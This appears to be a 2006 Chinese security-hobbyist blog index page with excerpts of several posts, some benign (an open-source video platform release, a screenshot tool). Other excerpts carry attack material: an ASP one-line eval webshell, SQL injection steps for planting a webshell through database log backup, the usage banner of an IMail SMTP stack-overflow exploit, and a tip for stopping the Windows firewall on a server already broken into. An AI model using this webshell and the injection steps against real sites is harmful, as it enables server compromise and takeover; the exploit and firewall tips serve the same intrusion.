菠萝网发布“视频分享平台”源代码

2006/11/27 8:12 | 鬼仔 | 乱七八糟 | 3 条评论了已经

来源:WappBlog
前一阵子,国内播客服务网站之一的 菠萝网 提出口号说: 每个人都可以做一个YouTube ,也就是说为了让每个人都可以很方便地搭建一个像YouTube那样的播客平台(或视频分享平台),因此他们准备发布一款免费开源的”视频分享平台”,并发布了 演示版 。而就在前两天,菠萝网 宣布 该平台的源代码正式发布,感兴趣的朋友可到 Gotdotnet 上来下载。

平台信息如下:
Microsoft Visual C# 2003 + IIS5/6 + SQL Server(或Access)

关键功能有:
1. 音视频上载
2. 格式转化(现在流行转为Flash)格式
3. 在线Flash播放器
4. 交互,分享平台 (评论,留言)
5. 其他如RSS输出订阅,统计等等

个人认为,这次该开源平台的发布,使得进入播客类服务领域的门槛得到降低,今后此类服务必定会像BBS开源系统那样,变得更加普及,甚至于到达泛滥的地步,至少国内的digg类网站已有向此发展的趋势。

Tags:

DB_ONER权限日志备分专用一句话木马

2006/11/26 10:08 | 鬼仔 | 技术文章 | 消灭0留言

来源:s0n9 '5 b109

<%eval(request("a")):response.end%> 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.

日志备分WEBSHELL标准的七步:

1.InjectionURL';alter database XXX set RECOVERY FULL– (把SQL设置成日志完全恢复模式)

2.InjectionURL';create table cmd (a image)– (新建立一个cmd表)

3.InjectionURL';backup log XXX to disk = 'c:\cmd' with init– (减少备分数据的大小)
阅读全文 »

Tags:

Hacker Defender 的作者死了?

2006/11/26 6:02 | 鬼仔 | 乱七八糟 | 7 条评论了已经

在 Sowhat 那里看到这个消息,然后我去原帖看了下。。整理了一下。。

鬼仔:Hacker Defender 大家都知道吧?国外有个论坛说其作者死于车祸了,并对 hxdef 做出高度评价,叙述了 hxdef 对业界的影响。
不过目前消息还没被得到证实,如果是真的,那就真的太可惜了,一位牛人啊。。
是有人在 Sysinternals Forums 发了一篇名为“Rootkit author Killed !”的帖子,内容如下:

hf = Holy Father, the guy who coded

阅读全文 »

IMail 2006 and 8.x的Exp

2006/11/25 10:48 | 鬼仔 | 工具收集 | 5 条评论了已经

来自:齐总的blog
C:\>imail2006_8.x_1.exe
IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit
Coded by Greg Linares < glinares.code [at] GMAIL [dot] com >
Usage: imail2006_8.x_1.exe [hostname] [port] <Payload> <JMP>
Default port is 25
==============================
Payload Options: 1 = Default
==============================
阅读全文 »

Tags: ,

Bambalam PHP EXE Compiler/Embedder

2006/11/25 9:59 | 鬼仔 | 工具收集 | 4 条评论了已经

从一位叫 like 的朋友那里得知这个小工具的,然后去 google 了一下,就有了这篇日志。

Bambalam PHP EXE Compiler/Embedder 是一个小巧的命令行工具,能够把 php 脚本转换成 windows 的标准 exe 可执行文件,我们可以用他把那些 php 写的 exp 转换成 exe ,这样就不用再在 php 环境下运行 exp 了。

特点:
阅读全文 »

Tags: ,

命令行下建立虚拟目录

2006/11/24 7:46 | 鬼仔 | 技术文章 | 2 条评论了已经

文章作者:臭要饭的!

很久,很久没有和大家聊天了,很想大家的。见面先就给大家送个小礼吧。其实也不是什么好东西。
在研究和学习中进步,没有研究,没有深入的去了解,就没有进步。认真的学习态度+穷追不舍+十万个为什么。
得到的结果就是成就!
好了,屁话放了太多了。明白的人,不看上面的话都明白。不明白的人,看了也许永远也不会明白。

系统中有个VBS也可以实现这样的功能的。不过我认为,如果在台虚拟主机中,存在多个网站的情况下。
建立虚拟目录,也只能在第一个默认的站点中。一般情况下虚拟主机默认是关掉的。也就是你建好了,通过HTTP也不能访问。
从MSDN中,我找到了一些相关的技术资料,写了个小工具。可以建立在其它站点中。这里看来说起来有点混乱。
阅读全文 »

Tags:

怎样停止ICS防火墙

2006/11/24 5:08 | 鬼仔 | 技术文章 | 消灭0留言

ps:我记得net stop SharedAccess是可以停止的,我成功过。我觉得这篇文章的标题改成“命令行下查看防火墙详细配置”比较准确。

from:swap's blog

现在越来越多的服务器用的是ICS防火墙,配合ipsec来管理远程登陆和端口安全
搞的真是要天下无黑了
很多服务器直接打下来却连不上3389,仔细分析完也没找到什么防火墙或者新鲜软件,ipsec服务关闭以后也没效果。着实郁闷了一翻
想一想就是自带ICS搞的鬼吧

服务中显示:
Windows Firewall/Internet Connection Sharing (ICS)
我们可以用
阅读全文 »

FastStone Capture

2006/11/23 7:41 | 鬼仔 | 工具收集 | 消灭0留言

以前推荐过一个我一直在用的截图软件: 一个50K大小的截图工具
今天再推荐一个:FastStone Capture 。
FastStone Capture 不但可以截图,还有另外两个比较实用的功能:取色器和屏幕放大镜。

取色器
FastStone Capture的取色支持RGB、Dec和Hex三种格式的色值,而且还有一个混色器,取到颜色之后可以再编辑。
阅读全文 »